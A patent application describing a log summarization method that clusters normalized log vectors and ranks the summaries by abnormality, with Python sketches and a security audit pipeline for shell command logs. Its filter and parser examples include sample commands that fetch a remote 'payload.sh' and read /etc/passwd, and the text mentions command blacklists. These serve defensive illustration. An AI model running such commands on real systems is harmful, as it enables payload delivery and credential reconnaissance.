Title:
METHOD FOR SUMMARIZING OPERATIONAL LOG DATA
Document Type and Number:
WIPO Patent Application WO/2023/198284
Kind Code:
A1
Abstract:
Provided is a method for summarizing operational log data including text data related to operations in a computer system (100). The log data is stored in a log database. The method includes obtaining text data from the log database and normalizing obtained text data by removing variable parts of the text data to generate normalized text data. The method includes generating one or more vectors of numerical values. The numerical values are related to terms present in the normalized text data. The method includes generating clusters of similar vectors by grouping the vectors based on one or more clustering criteria. The method includes extracting from the text data obtained from the log database auxiliary content related to entities in the computer system associated with operations corresponding to the obtained text data, and assigning to each cluster a part of the auxiliary content corresponding to the vectors in the cluster.

Inventors:
CAGLAYAN BORA (DE)
OLARIU CRISTIAN-ALEXANDRU (DE)
WANG MINGXUE (DE)
HU PENG (DE)
Application Number:
PCT/EP2022/059904
Publication Date:
October 19, 2023
Filing Date:
April 13, 2022
Assignee:
HUAWEI TECH CO LTD (CN)
CAGLAYAN BORA (DE)
International Classes:
G06F16/35
Foreign References:
US20200184355A12020-06-11
Other References:
BHANAGE DEEPALI ARUN ET AL: "IT Infrastructure Anomaly Detection and Failure Handling: A Systematic Literature Review Focusing on Datasets, Log Preprocessing, Machine & Deep Learning Approaches and Automated Tool", IEEE ACCESS, IEEE, USA, vol. 9, 15 November 2021 (2021-11-15), pages 156392 - 156421, XP011890753, DOI: 10.1109/ACCESS.2021.3128283
Attorney, Agent or Firm:
KREUZ, Georg M. (DE)
Claims:
CLAIMS

1. A method for summarizing operational log data comprising text data related to operations in a computer system (100), said log data being stored in a log database, the method comprising the steps of: obtaining text data from the log database and normalizing obtained text data by removing variable parts of the text data to generate normalized text data; generating one or more vectors of numerical values, said numerical values being related to terms present in the normalized text data; generating clusters of similar vectors by grouping the vectors based on one or more clustering criteria; extracting from the text data obtained from the log database auxiliary content related to entities in the computer system (100) associated with operations corresponding to the obtained text data, and assigning to each cluster a part of said auxiliary content corresponding to the vectors in said cluster; determining, for each cluster, one or more representative vectors amongst the vectors in said cluster; determining, for each cluster, an abnormality score related to recurrence of said cluster over a determined period of time by comparing said cluster with other clusters stored in a cluster history over said period of time; and generating, for each cluster, a log summary based on the log data corresponding to the representative vectors and the corresponding auxiliary content, each of the generated log summaries being ranked according to the corresponding abnormality score.

2. The method according to claim 1, wherein prior to generating the vectors, normalized text data are filtered according to one or more filtering rules.

3. The method according to any of claims 1 and 2, wherein generating the clusters of similar vectors comprises determining distances between each vectors, and grouping vectors based on the determined distances.

4. The method according to any of claims 1 to 3, wherein determining, for each cluster, one or more representative vectors amongst the vectors in said cluster, comprises determining the vector, amongst the vectors in said cluster, closest to the center of the cluster and selecting said determined vector as being a representative vector.

5. The method according to any of claims 1 to 3, wherein determining, for each cluster, one or more representative vectors amongst the vectors in said cluster, comprises determining an average distance between each vector in said cluster and each of the other vectors in said cluster, and selecting the vector having the smallest average distance as being a representative vector.

6. The method according to any of claims 1 to 5, wherein determining, for each cluster, an abnormality score, comprises determining the distances between the center of said cluster and the centers of each cluster stored in the cluster history, and determining the abnormality score based on said determined distances.

7. The method according to any of claims 1 to 5, wherein determining, for each cluster, an abnormality score, comprises determining the average distances between each of the vectors in said cluster and each of the vectors of each cluster stored in the cluster history, and determining the abnormality score based on said determined average distances.

8. The method according to any of claims 1 to 7, wherein each generated cluster over the determined period of time is stored in the cluster history.

9. The method according to any of claims 1 to 7, wherein determining, for each cluster, an abnormality score, comprises generating the cluster history over the predetermined period of time by executing the steps of the method according to any of claims 1 to 3 over text data history from the log database corresponding to said period of time.

10. The method according to any of claims 1 to 7, wherein generating one or more vectors of numerical values comprises generating one or more fixed length vectors of numerical values, said numerical values being related to occurrence and/or occurrence frequency of terms in the normalized text data.

11. A computer program product comprising program instructions for performing the method according to any of claims 1 to 10, when executed by one or more processors (102A-N) in a computer system (100).

12. A computer system (100) comprising one or more processors (102A-N) and one or more memories (104A-N), said one or more memories (104A-N) storing program instructions which, when executed by said one or more processors (102A-N), causes said one or more processors (102A-N) to execute the method according to any of claims 1 to 10.

Description:
METHOD FOR SUMMARIZING OPERATIONAL LOG DATA

TECHNICAL FIELD

The disclosure relates to log summarization in operations, and more particularly, the disclosure relates to a method for summarizing operational log data related to operations in a computer system, a computer program product, and the computer system.

BACKGROUND

Log summarization produces a short digest of the operations performed on a computer system. One of the key problems for Site Reliability Engineers (SREs) is reaching the information relevant to a problem quickly, and one of the main obstacles is the extremely high volume of log entries, which an SRE cannot parse in due time. The SRE also needs to use complex queries depending on the problem, and there is no universal summarization solution for different categories of logs. Log entries typically follow pre-defined patterns, but spotting the individual details that differentiate entries of the same pattern is infeasible for the SRE. Summarizing the information to discard noise may help parse and extract actionable insights from these logs, with applications in fields such as system alarms, runtime logs, and security logs. An associated problem is finding patterns as a function of time, such as log recurrence, and factoring this aspect into a decision-making process. A log summarization approach may use multiple steps to normalize and vectorize the logs and afterward use historical patterns in the log messages to identify non-recurrent logs.

One of the known approaches discloses LogCluster, which clusters the logs and checks the recurrence of log sequences using a knowledge base and cosine similarity metrics; a score is assigned to each cluster, and the clusters are ranked based on that score. For clustering log sequences, each log event is normalized and the log sequence is turned into a vector. After vectorization, the log sequences are grouped into clusters based on a similarity value between two log sequences. A representative log sequence is selected from each cluster. This approach does not explicitly disclose transforming clusters back into a log template, associating auxiliary entities with clusters, or assigning related content to clusters. Another known approach discloses a log template extraction method that pre-processes the raw log message and uses a distributed word representation to vectorize the log messages online. To cluster the log messages, an online hierarchical clustering algorithm is then applied, and log templates are generated. This approach does not disclose associating auxiliary entities with clusters or assigning related content to clusters. Another known approach discloses clustering the raw log messages based on content similarity. The clustered messages are presented as a summary view. Another known approach discloses extracting information such as named entities from log messages, and a future enhancement to log signature generation using clustering and named entity recognition.

Most of the known approaches are tested on log summarization problems in which the logs do not come with log templates, so the approaches estimate the templates and are only applicable to logs with a limited number of log templates. Some logs also contain completely unstructured text, such as system commands, for which the template estimation approach is not useful. Another known approach is optimized for logs from a limited number of templates that are assumed to be constant over time, so a sudden change in log format may not be handled by this approach. Further, the known approaches do not check historical patterns to assign an abnormality score to the logs, and the output of these solutions is not ranked based on such a criterion. These are the main disadvantages of the known log summarization approaches.

Therefore, there arises a need to address the aforementioned technical drawbacks in known techniques or technologies in log summarization.

SUMMARY

It is an object of the disclosure to provide a method for summarizing operational log data related to operations in a computer system, a computer program product, and the computer system while avoiding one or more disadvantages of prior art approaches.

This object is achieved by the features of the independent claims. Further implementation forms are apparent from the dependent claims, the description, and the figures.

The disclosure provides a method for summarizing operational log data related to operations in a computer system, a computer program product, and the computer system.

According to a first aspect, there is provided a method for summarizing operational log data including text data related to operations in a computer system. The log data is stored in a log database. The method includes obtaining text data from the log database and normalizing obtained text data by removing variable parts of the text data to generate normalized text data. The method includes generating one or more vectors of numerical values. The numerical values are related to terms present in the normalized text data. The method includes generating clusters of similar vectors by grouping the vectors based on one or more clustering criteria. The method includes extracting from the text data obtained from the log database auxiliary content related to entities in the computer system associated with operations corresponding to the obtained text data, and assigning to each cluster a part of the auxiliary content corresponding to the vectors in the cluster. The method includes determining one or more representative vectors for each cluster amongst the vectors in the cluster. The method includes determining an abnormality score for each cluster related to recurrence of the cluster over a determined period of time by comparing the cluster with other clusters stored in a cluster history over the period of time. The method includes generating a log summary for each cluster based on the log data corresponding to the representative vectors and the corresponding auxiliary content, each of the generated log summaries being ranked according to the corresponding abnormality score.

This method provides faster summarization of key log information compared to manual human filtering on log management systems. This method ranks log summaries by their relative importance based on historical recurrence patterns. This method provides reusability, in that any type of log can be processed through the same pipeline with minimal re-configuration. This method provides versatility in log filtering by giving a user the opportunity to define different tokenization and filter rules based on the category of the logs.

This method provides a log summarizer that may be used to filter out noise in large log streams for operations activities dynamically. This method provides log analytics capabilities with a public cloud offering. This method may normalize, embed, and cluster operational logs and transform each cluster back into a log template and a representative log. This method may associate auxiliary entities with clusters and assign related content to clusters. This method may use historical clusters to rank a new candidate cluster as recurrent or not.

This method applies to system logs and defines a processing pipeline system to integrate the summarization method and to explain log summaries. This method also assigns a recurrence metric for the log streams to estimate non-recurrent clusters. This method may be applicable to both structured and unstructured text-based logs, and may be agnostic in the applied domain.

Optionally, prior to generating the vectors, normalized text data are filtered according to one or more filtering rules.

Optionally, generating the clusters of similar vectors includes determining distances between the vectors, and grouping the vectors based on the determined distances.

Optionally, determining, for each cluster, one or more representative vectors amongst the vectors in the cluster includes determining the vector, amongst the vectors in the cluster, closest to the center of the cluster and selecting the determined vector as a representative vector.

Optionally, determining, for each cluster, one or more representative vectors amongst the vectors in the cluster includes determining an average distance between each vector in the cluster and each of the other vectors in the cluster, and selecting the vector having the smallest average distance as a representative vector.

Optionally, determining, for each cluster, an abnormality score includes determining the distances between the center of the cluster and the centers of each cluster stored in the cluster history, and determining the abnormality score based on the determined distances.

Optionally, determining, for each cluster, an abnormality score includes determining the average distances between each of the vectors in the cluster and each of the vectors of each cluster stored in the cluster history, and determining the abnormality score based on the determined average distances.

Optionally, each generated cluster over the determined period of time is stored in the cluster history. Optionally, determining, for each cluster, an abnormality score includes generating the cluster history for the determined period of time from the text data history in the log database corresponding to that period of time.

Optionally, generating one or more vectors of numerical values includes generating one or more fixed length vectors of numerical values, the numerical values being related to occurrence and/or occurrence frequency of terms in the normalized text data.
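As an illustration of fixed length vectors based on term occurrence frequency, the following minimal sketch builds a vocabulary over the normalized text and maps each log line to a vector with one position per term. The function names, the placeholder tokens such as `<IP>`, and the sample lines are assumptions made for this example and are not taken from the disclosure.

```python
from collections import Counter

def build_vocabulary(normalized_logs):
    """Collect every distinct term, sorted so that vector positions are stable."""
    return sorted({term for line in normalized_logs for term in line.split()})

def vectorize(line, vocabulary):
    """Return a fixed length vector of term occurrence frequencies for one line."""
    counts = Counter(line.split())
    total = sum(counts.values()) or 1  # avoid division by zero on empty lines
    return [counts[term] / total for term in vocabulary]

# Hypothetical normalized log lines (variable parts already replaced).
normalized_logs = [
    "connection from <IP> closed",
    "connection from <IP> opened",
    "disk usage at <NUM> percent",
]
vocabulary = build_vocabulary(normalized_logs)
vectors = [vectorize(line, vocabulary) for line in normalized_logs]
```

Every vector has the same length as the vocabulary, so lines with different numbers of terms can be compared with an ordinary distance measure.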

According to a second aspect, there is provided a computer program product including program instructions for performing the method, when executed by one or more processors in a computer system.

The computer program product provides faster summarization of key log information compared to manual human filtering on log management systems. The computer program product ranks log summaries by their relative importance based on historical recurrence patterns. The computer program product provides reusability, in that any type of log can be processed through the same pipeline with minimal re-configuration. The computer program product provides versatility in log filtering by giving a user the opportunity to define different tokenization and filter rules based on the category of the logs.

The computer program product provides a log summarizer that may be used to filter out noise in large log streams for operations activities dynamically. The computer program product provides log analytics capabilities with a public cloud offering. The computer program product may normalize, embed, and cluster operational logs and transform each cluster back into a log template and a representative log. The computer program product may associate auxiliary entities with clusters and assign related content to clusters. The computer program product may use historical clusters to rank a new candidate cluster as recurrent or not.

According to a third aspect, there is provided a computer system including one or more processors and one or more memories. The one or more memories store program instructions which, when executed by the one or more processors, cause the one or more processors to execute the method. The computer system provides faster summarization of key log information compared to manual human filtering on log management systems. The computer system ranks log summaries by their relative importance based on historical recurrence patterns. The computer system provides reusability, in that any type of log can be processed through the same pipeline with minimal re-configuration. The computer system provides versatility in log filtering by giving a user the opportunity to define different tokenization and filter rules based on the category of the logs.

The computer system provides a log summarizer that may be used to filter out noise in large log streams for operations activities dynamically. The computer system provides log analytics capabilities with a public cloud offering. The computer system may normalize, embed, and cluster operational logs and transform each cluster back into a log template and a representative log. The computer system may associate auxiliary entities with clusters and assign related content to clusters. The computer system may use historical clusters to rank a new candidate cluster as recurrent or not.

The computer system applies to system logs and defines a processing pipeline system to integrate the summarization method and to explain log summaries. The computer system also assigns a recurrence metric for the log streams to estimate non-recurrent clusters. The computer system may be applicable to both structured and unstructured text-based logs, and may be agnostic in the applied domain.

Therefore, in contradistinction to the prior art, the method for summarizing operational log data related to operations in a computer system, the computer program product, and the computer system provide an improvement through faster summarization of key log information with log summary ranking, reusability, and versatility.

These and other aspects of the disclosure will be apparent from the implementation(s) described below.

BRIEF DESCRIPTION OF DRAWINGS

Implementations of the disclosure will now be described, by way of example only, with reference to the accompanying drawings, in which:

FIG. 1 is a block diagram of a computer system in accordance with an implementation of the disclosure;

FIG. 2A is an exemplary flow diagram that illustrates components for a log summarization process in accordance with an implementation of the disclosure;

FIG. 2B is an exemplary graphical representation of output for operational log summaries for the log summarization process in accordance with an implementation of the disclosure;

FIG. 2C is an exemplary block diagram of the log summarization process for a security audit use case in accordance with an implementation of the disclosure;

FIG. 3 is a flow diagram that illustrates a method for summarizing operational log data including text data related to operations in a computer system in accordance with an implementation of the disclosure; and

FIG. 4 is an illustration of a computing arrangement (e.g. a computer system) that is used in accordance with implementations of the disclosure.

DETAILED DESCRIPTION OF THE DRAWINGS

Implementations of the disclosure provide a method for summarizing operational log data related to operations in a computer system, a computer program product, and the computer system.

To make solutions of the disclosure more comprehensible for a person skilled in the art, the following implementations of the disclosure are described with reference to the accompanying drawings.

Terms such as "a first", "a second", "a third", and "a fourth" (if any) in the summary, claims, and foregoing accompanying drawings of the disclosure are used to distinguish between similar objects and are not necessarily used to describe a specific sequence or order. It should be understood that the terms so used are interchangeable under appropriate circumstances, so that the implementations of the disclosure described herein are, for example, capable of being implemented in sequences other than the sequences illustrated or described herein. Furthermore, the terms "include" and "have" and any variations thereof, are intended to cover a non-exclusive inclusion. For example, a process, a method, a system, a product, or a device that includes a series of steps or units, is not necessarily limited to expressly listed steps or units but may include other steps or units that are not expressly listed or that are inherent to such process, method, product, or device.

FIG. 1 is a block diagram of a computer system 100 in accordance with an implementation of the disclosure. The computer system 100 includes one or more processors 102A-N and one or more memories 104A-N. The one or more memories 104A-N store program instructions which, when executed by the one or more processors 102A-N, cause the one or more processors 102A-N to execute a method for summarizing operational log data.

The computer system 100 provides faster summarization of key log information compared to manual human filtering on log management systems. The computer system 100 ranks log summaries by their relative importance based on historical recurrence patterns. The computer system 100 provides reusability, in that any type of log can be processed through the same pipeline with minimal re-configuration. The computer system 100 provides versatility in log filtering by giving a user the opportunity to define different tokenization and filter rules based on the category of the logs.

The computer system 100 provides a log summarizer that may be used to filter out noise in large log streams for operations activities dynamically. The computer system 100 provides log analytics capabilities with a public cloud offering. The computer system 100 may normalize, embed, and cluster operational logs and transform each cluster back into a log template and a representative log. The computer system 100 may associate auxiliary entities with clusters and assign related content to clusters. The computer system 100 may use historical clusters to rank a new candidate cluster as recurrent or not.

The computer system 100 applies to system logs and defines a processing pipeline system to integrate the summarization method and to explain log summaries. The computer system 100 also assigns a recurrence metric for the log streams to estimate non-recurrent clusters. The computer system 100 may be applicable to both structured and unstructured text-based logs, and may be agnostic in the applied domain.

The log data may be stored in a log database. The one or more processors 102A-N are configured to obtain text data from the log database and normalize obtained text data by removing variable parts of the text data to generate normalized text data. The one or more processors 102A-N are configured to generate one or more vectors of numerical values. The numerical values may be related to terms present in the normalized text data. The one or more processors 102A-N are configured to generate clusters of similar vectors by grouping the vectors based on one or more clustering criteria. The one or more processors 102A-N are configured to extract from the text data obtained from the log database auxiliary content related to entities in the computer system 100 associated with operations corresponding to the obtained text data, and assign to each cluster a part of the auxiliary content corresponding to the vectors in the cluster. The one or more processors 102A-N are configured to determine, for each cluster, one or more representative vectors amongst the vectors in the cluster. The one or more processors 102A-N are configured to determine, for each cluster, an abnormality score related to recurrence of the cluster over a determined period of time by comparing the cluster with other clusters stored in a cluster history over the period of time. The one or more processors 102A-N are configured to generate, for each cluster, a log summary based on the log data corresponding to the representative vectors and the corresponding auxiliary content, each of the generated log summaries being ranked according to the corresponding abnormality score.

FIG. 2A is an exemplary flow diagram that illustrates components for a log summarization process in accordance with an implementation of the disclosure. The components include log management 202, an event trigger 204, a log query 206, log summarization 208, historical log clusters 210, log recurrence analysis 212, and a log summary 214. The log management 202 is a production solution used to store and monitor operations logs. Optionally, the log management 202 provides a technology stack that is used to store, query, and report log data. The production solution may be accessed programmatically for log summarization. The log summarization process may be tested on a standard Elasticsearch, Logstash, Kibana (ELK) stack log management software utilized by a consumer business group. Optionally, the ELK stack log management software is an open-source toolset with high popularity. The log management 202 may be plugged into other open-source or commercial solutions on the market that offer similar functionality.

The event trigger 204 is a change in service operations that affects a certain subset. Optionally, the certain subset includes alarms. The log summarization process enables the event trigger 204 to provide two modes of operation: a reactive mode and an active mode. The reactive mode of operation is triggered reactively after observation of an event such as an alarm. Optionally, the reactive mode is an event-triggered mode. The active mode of operation continuously monitors a sub-portion of the logs and generates log summaries actively. The log query 206 is a query generated by the log summarization process based on the trigger event for event-based summarization or on a time duration for active summarization. The log query 206 may support random sampling for log streams with high volume. In an instance, 10% of the logs may be monitored for high-volume streams.

The log summarization 208 is the step that clusters the logs and returns a cluster explanation. The log summarization 208 is a pipeline that includes text normalization, rule-based filtering, vectorization, clustering, and explanation. The historical log clusters 210 include past log clusters for past time chunks. The past log clusters may be stored in a database for long durations as the size of the log clusters is small. Optionally, the past log clusters are summaries of the logs. The size of the log clusters may be less than 2 kilobytes per summary. Optionally, the summaries are stored in a PostgreSQL RDBMS. The past summaries may be used to rank new log summaries in terms of their abnormality. The log recurrence analysis 212 is configured to check historical cluster similarity to estimate a recurrence score for the logs. The log summaries may be ranked based on their edit distance from the historical clusters. The log summary 214 provides a summary of the operational logs returned by a query, with optional auxiliary entity mappings, together with their recurrence rankings. The log summarization pipeline may include one or more steps to transform a batch of raw log data into a log summary. The following table provides sample pipeline details for use cases.

The text normalization step may differ based on the natural language content in the logs. Optionally, variable parts of the text are removed in the text normalization step. If the log contains mostly natural language data, numbers or set parameters may be removed. If the log contains computer language fragments, a lexer or scanner may be used to remove the variable parts, including variable values. The log summarization process includes rule-based filtering that filters logs based on user-defined regular expressions. The logs that are related to a particular IP or domain may be filtered in the rule-based filtering. Optionally, after the logs are cleaned, the processed text can be embedded as a dense vector using an available text vectorization algorithm. Optionally, vectorization, feature reduction, and clustering segment a large unstructured log stream. In an instance, GloVe is used, but other context-dependent vectorization algorithms can be trialled in the log summarization process. The logs in vector space may be clustered using a standard clustering algorithm. In an instance, HDBSCAN and affinity propagation algorithms are used for clustering. For each cluster, one or more auxiliary columns may be appended to the cluster information. Optionally, the one or more auxiliary columns may include entities that are associated with the log message under different column names. The entities may include server host names and user names. In the explanation phase, a representative log is defined by decoding the cluster content and getting the log nearest the cluster centroid. The content of the cluster may contain the representative normalized log and associated entities. Optionally, the explainable results include any of a cluster summary, a representative member of the cluster, the cluster size, or the cluster pattern count.
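The normalization, auxiliary entity extraction, and rule-based filtering steps described above can be sketched as follows. This is a minimal illustration under stated assumptions: the `host=` and `user=` field layout, the regular expressions, the sample log lines, and the choice to substitute placeholder tokens (rather than delete the variable parts outright) are all hypothetical and would be tuned per log category.

```python
import re

# Hypothetical patterns for illustration; real rules depend on the log category.
HOST_RE = re.compile(r"\bhost=(\S+)")
USER_RE = re.compile(r"\buser=(\S+)")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
NUM_RE = re.compile(r"\b\d+\b")

def extract_entities(line):
    """Pull auxiliary content (host and user names) out of the raw line."""
    return {"host": HOST_RE.findall(line), "user": USER_RE.findall(line)}

def normalize(line):
    """Replace variable parts with placeholders, most specific pattern first."""
    line = HOST_RE.sub("host=<HOST>", line)
    line = USER_RE.sub("user=<USER>", line)
    line = IP_RE.sub("<IP>", line)
    return NUM_RE.sub("<NUM>", line)

def passes_filters(normalized, drop_patterns):
    """Keep a line only if no user-defined regular expression matches it."""
    return not any(re.search(pattern, normalized) for pattern in drop_patterns)

raw_logs = [
    "host=web-01 user=alice login failed from 10.0.0.7 after 3 attempts",
    "host=web-02 user=bob login failed from 10.0.0.9 after 5 attempts",
    "host=web-01 heartbeat ok seq=1842",
]
drop_patterns = [r"\bheartbeat\b"]  # user-defined filter rule (assumed)

records = [
    {"normalized": normalize(line), "entities": extract_entities(line)}
    for line in raw_logs
]
kept = [r for r in records if passes_filters(r["normalized"], drop_patterns)]
```

In this sketch the two login failures normalize to the same text, so they would fall into the same cluster, while their host and user names survive separately as auxiliary columns.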

The HDBSCAN algorithm may transform the space according to density/sparsity, which identifies dense zones in a computationally efficient manner. The HDBSCAN algorithm may build a minimum spanning tree of a distance-weighted graph. Optionally, HDBSCAN constructs a cluster hierarchy of connected components, condenses the cluster hierarchy based on a minimum cluster size, and extracts stable clusters from the condensed tree. Optionally, the log summarization process uses a core distance, which is the distance from a point to its k-th nearest neighbour, and a space transformation in which the distance between points a and b is transformed with the formula: $d_{\mathrm{mreach}\text{-}k}(a,b) = \max\{\mathrm{core}_k(a), \mathrm{core}_k(b), d(a,b)\}$. If the zone is sparse, the distance between the points may be increased.
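The core distance and the transformed (mutual reachability) distance can be illustrated with a few lines of plain Python. This is only a sketch of the formula, not of the full clustering algorithm; the Euclidean metric, the function names, and the sample points are assumptions made for the example.

```python
import math

def core_distance(point, points, k):
    """Distance from `point` to its k-th nearest neighbour.

    `point` is assumed to be a member of `points`, so index 0 of the sorted
    list is the point's zero distance to itself and index k is the k-th
    nearest neighbour.
    """
    return sorted(math.dist(point, other) for other in points)[k]

def mutual_reachability(a, b, points, k):
    """max{core_k(a), core_k(b), d(a, b)} for two members of `points`."""
    return max(
        core_distance(a, points, k),
        core_distance(b, points, k),
        math.dist(a, b),
    )

# Three points in a dense zone and one isolated point (hypothetical data).
points = [(0.0, 0.0), (0.0, 1.0), (1.0, 0.0), (10.0, 0.0)]
dense_pair = mutual_reachability(points[0], points[1], points, k=2)
sparse_pair = mutual_reachability(points[2], points[3], points, k=2)
```

For the isolated point the core distance (10.0) exceeds its raw distance to the nearest neighbour (9.0), so the transformed distance grows, which is the effect described for sparse zones.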

Optionally, each cluster includes N log items with vector representations. The log summarization process may transform a vector back into a log by checking the nearest logs in terms of distance. The log summarization process may select representative logs in the cluster for decoding. The selection process for the representative logs is based on the clustering algorithm used: if the algorithm generates convex clusters, the node that is nearest to the cluster centre is selected; otherwise, the log instance with the smallest average distance across the spanning tree is selected as an exemplar instance for the cluster. For HDBScan, the generated clusters may not have centres as the clusters are not convex.
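The two selection strategies above can be sketched as follows. This is a simplified illustration: the function names are hypothetical, and the second strategy averages plain pairwise Euclidean distances rather than distances across the spanning tree mentioned in the text.

```python
import math


def euclidean(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def nearest_to_centre(vectors):
    """Index of the vector closest to the arithmetic mean of the cluster."""
    centre = [sum(column) / len(vectors) for column in zip(*vectors)]
    return min(range(len(vectors)), key=lambda i: euclidean(vectors[i], centre))


def smallest_average_distance(vectors):
    """Index of the vector with the smallest mean distance to the others."""
    if len(vectors) == 1:
        return 0

    def average_distance(i):
        total = sum(
            euclidean(vectors[i], v) for j, v in enumerate(vectors) if j != i
        )
        return total / (len(vectors) - 1)

    return min(range(len(vectors)), key=average_distance)


def representative_index(vectors, convex):
    """Pick the strategy according to whether the clusters are convex."""
    if convex:
        return nearest_to_centre(vectors)
    return smallest_average_distance(vectors)
```

The returned index can then be used to look up the original log line, which is the decoding step from vector space back to text.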

Optionally, the log recurrence analysis ranks summaries by abnormality using an algorithm. Users may define a time interval, for example 24 hours or 1 hour, and the number of past intervals to check. Cached summaries for the historical periods are obtained if they exist; if no cache exists, the summaries for the historical periods are generated. For example, if the goal is to summarize a portion of logs for the last 10 minutes, the time interval is 24 hours, and the past interval count is 3, the algorithm compares the summary with the previous summaries from the same time 1, 2, and 3 days before. After the historical summaries are obtained, the summaries may be ranked based on maximum edit distance. A new summary with the maximum edit distance may be ranked as the most abnormal log summary, indicating a new pattern. Optionally, the time interval and interval count can be calibrated based on the problem domain.

The output of the log recurrence analysis is a ranking of log templates based on their abnormality. The analysis includes the following: the user specifies t time ranges; the logs for the specified time ranges are summarized; the maximum normalized edit distance between clusters is used to determine the log abnormality ranking; and the log abnormality ranking is used to rank the summarized logs for the end user.
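The recurrence analysis described above can be sketched in Python as follows. The sketch is one possible reading: it scores each new summary by its normalized edit distance to the closest historical summary and ranks the largest scores first. The disclosure speaks only of a maximum normalized edit distance, so this per-summary scoring rule, like all function names here, is an assumption.

```python
from datetime import datetime, timedelta


def historical_windows(end, window, interval, past_intervals):
    """(start, end) pairs for the same window 1..past_intervals intervals back."""
    return [
        (end - window - n * interval, end - n * interval)
        for n in range(1, past_intervals + 1)
    ]


def edit_distance(a, b):
    """Levenshtein distance computed row by row."""
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, 1):
        current = [i]
        for j, char_b in enumerate(b, 1):
            current.append(min(
                previous[j] + 1,                       # deletion
                current[j - 1] + 1,                    # insertion
                previous[j - 1] + (char_a != char_b),  # substitution
            ))
        previous = current
    return previous[-1]


def normalized_edit_distance(a, b):
    longest = max(len(a), len(b))
    return edit_distance(a, b) / longest if longest else 0.0


def rank_by_abnormality(new_summaries, history):
    """Most abnormal first. Assumed score: distance to the closest past summary."""
    def score(summary):
        return min(
            (normalized_edit_distance(summary, past) for past in history),
            default=1.0,  # no history at all: treat everything as new
        )
    return sorted(new_summaries, key=score, reverse=True)


if __name__ == "__main__":
    end = datetime(2022, 4, 13, 12, 0)
    for start, stop in historical_windows(
        end, timedelta(minutes=10), timedelta(hours=24), 3
    ):
        print(start, stop)
```

With a 10-minute window, a 24-hour interval, and a past interval count of 3, `historical_windows` yields the same 10-minute slot on each of the three preceding days, matching the example given in the text.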

FIG. 2B is an exemplary graphical representation of output for operational log summaries for the log summarization process in accordance with an implementation of the disclosure. The exemplary graphical representation illustrates a user interface of a log summarization run for a representative normalized log of seven patterns. The log summarization process may be integrated with machine learning models in a manner that is scalable to all shell commands run across all virtual machines, with a maximum end-to-end delay of 10 minutes.

FIG. 2C is an exemplary block diagram of the log summarization process for security audit use cases in accordance with an implementation of the disclosure. The exemplary block diagram includes a security log stream 216, a semantic log parser 218, a security log filter 220, a log abnormality estimator 222, a supervised threat classifier 224, a security log summarizer 226, a log embedder 228, a daily log summaries repository 230, a rolling warning filter 232, daily attack warnings 234, and one or more data sources 236A-N. The security log stream 216 is a primary data source that includes shell commands to run on hosts. The semantic log parser 218 receives the shell commands from the security log stream 216 and is configured to tokenize the bash commands in the shell commands, parse each command to identify subcommands that are linked together, and check the CMDB and command semantics database sources to match the type of a token with a known entity. The semantic parser output of the semantic log parser 218 may be used in template formation for the log summarizer.
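The tokenizing and subcommand identification performed by the semantic log parser 218 can be approximated with the Python standard library. In this minimal sketch, the `known_entities` dictionary is a hypothetical stand-in for lookups against the CMDB and the command semantics database, and only `|`, `||`, `&&`, and `;` are treated as links between subcommands.

```python
import shlex

# Shell operators treated as links between subcommands (an assumption).
SEPARATORS = {"|", "||", "&&", ";"}


def split_subcommands(command):
    """Tokenize a shell command line and group tokens into subcommands."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    subcommands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                subcommands.append(current)
                current = []
        else:
            current.append(token)
    if current:
        subcommands.append(current)
    return subcommands


def tag_tokens(tokens, known_entities):
    """Pair each token with its entity type, or UNKNOWN if it is not known."""
    return [(token, known_entities.get(token, "UNKNOWN")) for token in tokens]


if __name__ == "__main__":
    entities = {"ssh": "COMMAND", "db-host-01": "HOST"}  # hypothetical lookup
    for sub in split_subcommands("ssh db-host-01 && cat /etc/passwd | grep root"):
        print(tag_tokens(sub, entities))
```

Tokens tagged with an entity type can be replaced by that type when a template is formed, so that commands differing only in host or user collapse into one pattern.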

The security log filter 220 is configured to filter logs with access to external IPs by using semantically parsed logs as the input from the semantic log parser 218. The security log filter 220 may filter audit log and Unix user modification operations, DDL and serious DML commands in a script, and white lists and black lists that are customized by the user. The security log summarizer 226 is configured to cluster the logs per day. Optionally, the security log summarizer 226 uses embed, cluster, and explain functionality for clustering the logs. The log embedder 228 is configured to embed the logs in vector space with the clusters of the logs. The daily log summaries repository 230 is configured to provide cluster details with host details of the log summaries.
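The external IP check of the security log filter 220 might look like the following sketch. It treats any IPv4 address outside the private and loopback ranges as external; that definition, the regular expression, and the function name are assumptions for illustration.

```python
import ipaddress
import re

# Candidate IPv4 literals; validity is checked by the ipaddress module below.
_IPV4_CANDIDATE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def accesses_external_ip(command):
    """True if the command mentions an IPv4 address that is not private."""
    for candidate in _IPV4_CANDIDATE.findall(command):
        try:
            address = ipaddress.ip_address(candidate)
        except ValueError:
            continue  # looks like an address but is not a valid one
        if not address.is_private:
            return True
    return False


if __name__ == "__main__":
    commands = ["curl http://8.8.8.8/payload.sh", "ssh admin@10.0.0.5", "ls -la"]
    print([c for c in commands if accesses_external_ip(c)])
```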

The log abnormality estimator 222 receives the daily log summaries from the daily log summaries repository 230, and the filtered logs. The log abnormality estimator 222 is configured to check the similarity of the filtered logs to seasonal clusters for previous days and to check if the log comes from a different type of host. The log abnormality estimator 222 may also check if a particular log is abnormally observed in a session on a host. The supervised threat classifier 224 is configured to predict a verified attack in the filtered log data. The rolling warning filter 232 is configured to provide a rolling warning for a current day, which may be updated every predetermined time. Optionally, the predetermined time is in a range of 5 minutes to 15 minutes. The rolling warning may include a judgement that includes command abnormal, associated black list pattern, associated verified attack, and associated context. The daily attack warnings 234 are configured to provide attack warnings. The attack warning may include a judgement that includes command abnormal, associated black list pattern, associated verified attack, and associated context.

The one or more data sources 236A-N include an Arango database, a command semantics database, a blacklists database, and a verified attack database. The Arango database may be used to get context related to hosts and the like. The semantic log parser 218 may get context from the Arango database, and semantic commands from the command semantics database. The security log filter 220 may store the blacklists in the blacklists database. The supervised threat classifier 224 may store the verified attacks in the verified attack database.

